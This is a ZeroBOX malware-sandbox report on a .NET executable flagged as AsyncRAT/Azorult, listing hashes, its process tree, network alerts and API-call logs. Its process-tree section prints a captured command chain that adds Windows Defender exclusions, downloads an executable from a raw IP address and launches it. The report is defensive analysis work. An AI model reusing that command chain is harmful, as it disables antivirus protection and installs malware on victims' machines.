Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 15, 2021, 6:11 p.m.	Sept. 15, 2021, 6:13 p.m.

Size	332.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`ddc1e4f7216d422e2534c4cbc2ff34d5`
SHA256	`d8a64a77e6ee6cbbd28648418dc13b3c0906aece9be0744e90560f896d1a9aa4`
CRC32	`379C87F4`
ssdeep	`6144:A+BDiSKPxCWScCUDgd35ZFj6uf3wwoBd78yxcvfz6uiFaCrB:3DizxBS1pZFmw3wwo73xSfA`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

svch.exe "C:\Users\test22\AppData\Local\Temp\svch.exe"
2648
- AddInProcess32.exe "C:\Users\test22\AppData\Local\Temp\AddInProcess32.exe"
  2696
  - cmd.exe cmd /c powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force & powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force & powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')" & exit
    1816
    - powershell.exe powershell -Command Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
      2612
    - powershell.exe powershell -Command Add-MpPreference -ExclusionExtension @('exe','dll') -Force
      812
    - powershell.exe powershell "(New-Object System.Net.WebClient).DownloadFile('http://13.238.159.178/truth/svch.exe', (Join-Path -Path $env:AppData -ChildPath 'vbc.exe'))"
      2072
    - powershell.exe powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'vbc.exe')"
      540
      - vbc.exe "C:\Users\test22\AppData\Roaming\vbc.exe"
        1828

Name	Response	Post-Analysis Lookup
www.google.com	A 142.250.66.68 A 142.250.66.36	142.250.196.100

IP Address	Status	Action
13.107.21.200	Active	Moloch
13.238.159.178	Active	Moloch
142.250.66.36	Active	Moloch
142.250.66.68	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49198 -> 142.250.66.36:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 13.107.21.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49201 -> 204.79.197.200:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 13.238.159.178:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 13.238.159.178:80 -> 192.168.56.101:49210	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 13.238.159.178:80 -> 192.168.56.101:49210	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 13.238.159.178:80 -> 192.168.56.101:49210	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 142.250.66.68:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49198 142.250.66.36:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5e:4a:7d:c3:b7:3a:c0:64:72:14:d1:db:96:d5:f4:4c:52:6f:19:30
TLSv1 192.168.56.101:49201 204.79.197.200:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=www.bing.com	e6:d6:8f:e4:5e:31:2c:7f:a5:1a:6c:d5:bb:5c:15:c6:54:47:bf:47
TLSv1 192.168.56.101:49214 13.107.21.200:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02	CN=www.bing.com	e6:d6:8f:e4:5e:31:2c:7f:a5:1a:6c:d5:bb:5c:15:c6:54:47:bf:47
TLSv1 192.168.56.101:49213 142.250.66.68:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=www.google.com	5e:4a:7d:c3:b7:3a:c0:64:72:14:d1:db:96:d5:f4:4c:52:6f:19:30

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 6:11 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 6:11 p.m.			0	0

Command line console output was observed (17 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath @($env:UserProfile,$env:AppData,$env:Te console_handle: 0x00000053	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: mp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + Add-MpPreference <<<< -ExclusionExtension @('exe','dll') -Force console_handle: 0x00000053	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 15, 2021, 6:11 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 178 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00506df8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00506c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00506c78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059db00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059dc00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d6c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059df80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059d800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059e480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 15, 2021, 6:11 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00355608 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 15, 2021, 6:11 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://13.238.159.178/truth/svch.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.google.com/
suspicious_features	GET method with no useragent header	suspicious_request	GET https://www.bing.com/

Performs some HTTP requests (3 events)

request	GET http://13.238.159.178/truth/svch.exe
request	GET https://www.google.com/
request	GET https://www.bing.com/

Allocates read-write-execute memory (usually to unpack itself) (50 out of 708 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Sept. 15, 2021, 6:10 p.m.	process_identifier: 2648 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:10 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a70000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d3b2000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0518f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05180000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 15, 2021, 6:11 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
